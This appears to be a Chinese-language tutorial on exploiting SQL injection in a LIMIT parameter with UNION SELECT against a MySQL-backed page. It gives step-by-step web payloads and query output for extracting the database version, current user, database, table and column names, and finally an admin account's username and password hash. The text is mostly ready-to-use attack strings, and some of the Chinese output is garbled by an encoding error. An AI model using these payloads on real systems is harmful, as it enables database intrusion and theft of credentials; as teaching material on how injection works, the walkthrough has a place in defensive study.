0x00 记忆方式
select * from tdb_goods limit 0,2 union select 1,2,3,4,5,6,7
0x01 爆数据库版本
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,VERSION(),3,4,5,6,7
数据库语句: select * from tdb_goods limit 0,2 union select 1,VERSION(),3,4,5,6,7;
mysql> select * from tdb_goods limit 0,2 union select 1,VERSION(),3,4,5,6,7;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | 5.5.53 | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+
0x02 爆当前连接用户
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,user(),3,4,5,6,7;
数据库语句: select * from tdb_goods limit 0,2 union select 1,user(),3,4,5,6,7;
mysql> select * from tdb_goods limit 0,2 union select 1,user(),3,4,5,6,7;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | root@localhost | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.00 sec)
0x03 爆当前连接的数据库
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,database(),3,4,5,6,7;
数据库语句: select * from tdb_goods limit 0,2 union select 1,database(),3,4,5,6,7;
mysql> select * from tdb_goods limit 0,2 union select 1,database(),3,4,5,6,7;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | test | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.00 sec)
0x04 爆库名
注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,schema_name,3,4,5,6,7 from information_schema.schemata limit 0,3;
数据库语句: select * from tdb_goods limit 0,2 union select 1,schema_name,3,4,5,6,7 from information_schema.schemata limit 0,3;
mysql> select * from tdb_goods limit 0,2 union select 1,schema_name,3,4,5,6,7 from information_schema.schemata limit 0,3;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | information_schema | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.00 sec)
0x05 爆表名
注意: table_schema=xxx 修改为其他库会查出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=DATABASE() limit 0,3
数据库语句: select * from tdb_goods limit 0,2 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=DATABASE() limit 0,3;
mysql> select * from tdb_goods limit 0,2 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=DATABASE() limit 0,3;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | tdb_admin | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.00 sec)
0x06 暴字段
table_schema = “xx” 要看的数据库名
table_name = “xx” 要看的表名
limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 0,3
数据库语句-爆test库 tdb_admin表的字段名: select * from tdb_goods limit 0,2 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 0,3;
mysql> select * from tdb_goods limit 0,2 union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 0,3;+----------+---------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+---------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 | 0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | id | 3 | 4 | 5.000 | 6 | 7 |+----------+---------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.01 sec)
0x07 爆内容
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
web语句: http://www.test.com/limit_sql.php?limit=2 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4,5,6,7 from test.tdb_admin limit 0,3;
数据库语句: select * from tdb_goods limit 0,2 union select 1,concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e),3,4,5,6,7 from 库名.表名 limit 0,3;
mysql> select * from tdb_goods limit 0,2 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4,5,6,7 from test.tdb_admin limit 0,3;+----------+--------------------------------------------+------------+------------+-------------+---------+------------+| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |+----------+--------------------------------------------+------------+------------+-------------+---------+------------+| 1 | R510VC 15.6鑻卞绗旇鏈? | 绗旇鏈? | 鍗庣 | 3399.000 | 1 |0 || 2 | Y400N 14.0鑻卞绗旇鏈數鑴? | 绗旇鏈? | 鑱旀兂 | 4899.000 | 1 | 0 || 1 | ~1:admin:7fef6171469e80d32c0559f88b377245~ | 3 | 4 | 5.000 | 6 | 7 |+----------+--------------------------------------------+------------+------------+-------------+---------+------------+3 rows in set (0.00 sec)
若有收获,就点个赞吧
0 人点赞
